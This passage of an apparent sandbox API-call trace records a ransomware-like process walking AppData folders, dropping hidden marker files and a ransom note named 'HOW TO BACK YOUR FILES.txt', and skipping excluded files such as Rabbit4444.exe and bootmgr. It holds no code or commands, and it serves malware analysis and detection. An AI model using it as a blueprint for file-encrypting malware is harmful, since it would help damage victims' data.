ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x300a046, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 0 [0052.322] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0052.322] lstrcpyW (in: lpString1=0x130eb8c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.322] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.323] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.323] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.323] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.323] CloseHandle (hObject=0x278) returned 1 [0052.323] CloseHandle (hObject=0x27c) returned 1 [0052.323] GetCurrentThreadId () returned 0xd98 [0052.324] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1205b8 [0052.324] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word" [0052.324] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ca58 | out: hHeap=0xe0000) returned 1 [0052.324] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1205b0 | out: hHeap=0xe0000) returned 1 [0052.324] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word" [0052.324] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\" [0052.324] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\.BFC0E91B00AE8A0620D3" [0052.324] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\word\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.328] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.331] FlushFileBuffers (hFile=0x27c) returned 1 [0052.332] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.332] CloseHandle (hObject=0x27c) returned 1 [0052.332] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word") returned 46 [0052.332] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.332] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8820fc6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0052.333] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.333] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.333] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.333] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.333] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8820fc6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.333] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.333] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.333] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.333] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.333] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.333] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8820fc6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8820fc6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe88471d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.333] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.333] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.333] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x300a046, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2="Rabbit4444.exe") returned 1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2=".") returned 1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2="..") returned 1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2="windows") returned -1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2="bootmgr") returned 1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2="pagefile.sys") returned 1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2="boot") returned 1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2="ids.txt") returned 1 [0052.333] lstrcmpiW (lpString1="STARTUP", lpString2="NTUSER.DAT") returned 1 [0052.333] lstrcpyW (in: lpString1=0x130eb96, lpString2="STARTUP" | out: lpString1="STARTUP") returned="STARTUP" [0052.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120830 [0052.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6e) returned 0x117680 [0052.333] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120838 | out: ListHead=0xf68b0, ListEntry=0x120838) returned 0x120798 [0052.333] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x300a046, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 0 [0052.333] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0052.334] lstrcpyW (in: lpString1=0x130eb96, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.334] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\word\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.334] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.334] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.334] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.334] CloseHandle (hObject=0x278) returned 1 [0052.334] CloseHandle (hObject=0x27c) returned 1 [0052.334] GetCurrentThreadId () returned 0xd98 [0052.334] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120838 [0052.334] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0052.335] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0052.335] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120830 | out: hHeap=0xe0000) returned 1 [0052.335] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0052.335] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" [0052.335] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\.BFC0E91B00AE8A0620D3" [0052.335] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\word\\startup\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.336] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.338] FlushFileBuffers (hFile=0x27c) returned 1 [0052.339] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.339] CloseHandle (hObject=0x27c) returned 1 [0052.340] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned 54 [0052.340] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.340] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe88471d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0052.340] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.340] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.340] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.340] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.340] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe88471d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.340] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.340] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.340] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.340] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.340] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.340] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe88471d8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe88471d8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe88471d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.340] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.340] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.340] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe88471d8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe88471d8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe88471d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.340] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0052.340] lstrcpyW (in: lpString1=0x130eba6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.341] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\word\\startup\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.341] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.341] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.341] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.341] CloseHandle (hObject=0x278) returned 1 [0052.341] CloseHandle (hObject=0x27c) returned 1 [0052.341] GetCurrentThreadId () returned 0xd98 [0052.341] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120798 [0052.341] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault" [0052.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cbf8 | out: hHeap=0xe0000) returned 1 [0052.342] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120790 | out: hHeap=0xe0000) returned 1 [0052.342] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault" [0052.342] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\" [0052.342] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\.BFC0E91B00AE8A0620D3" [0052.342] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\vault\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.343] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.345] FlushFileBuffers (hFile=0x27c) returned 1 [0052.346] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.346] CloseHandle (hObject=0x27c) returned 1 [0052.347] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault") returned 47 [0052.347] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.347] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3bb556b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe88471d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0052.347] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.347] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.347] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.347] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.347] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3bb556b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe88471d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.347] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.347] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.347] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.347] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.347] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.347] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe88471d8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe88471d8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe886d468, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.347] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.347] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.347] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe88471d8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe88471d8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe886d468, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.348] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0052.348] lstrcpyW (in: lpString1=0x130eb98, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.348] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\vault\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.348] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.348] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.348] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.348] CloseHandle (hObject=0x278) returned 1 [0052.348] CloseHandle (hObject=0x27c) returned 1 [0052.348] GetCurrentThreadId () returned 0xd98 [0052.348] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1204f8 [0052.348] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof" [0052.348] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefd88 | out: hHeap=0xe0000) returned 1 [0052.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1204f0 | out: hHeap=0xe0000) returned 1 [0052.349] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof" [0052.349] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\" [0052.349] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\.BFC0E91B00AE8A0620D3" [0052.349] CreateFileW 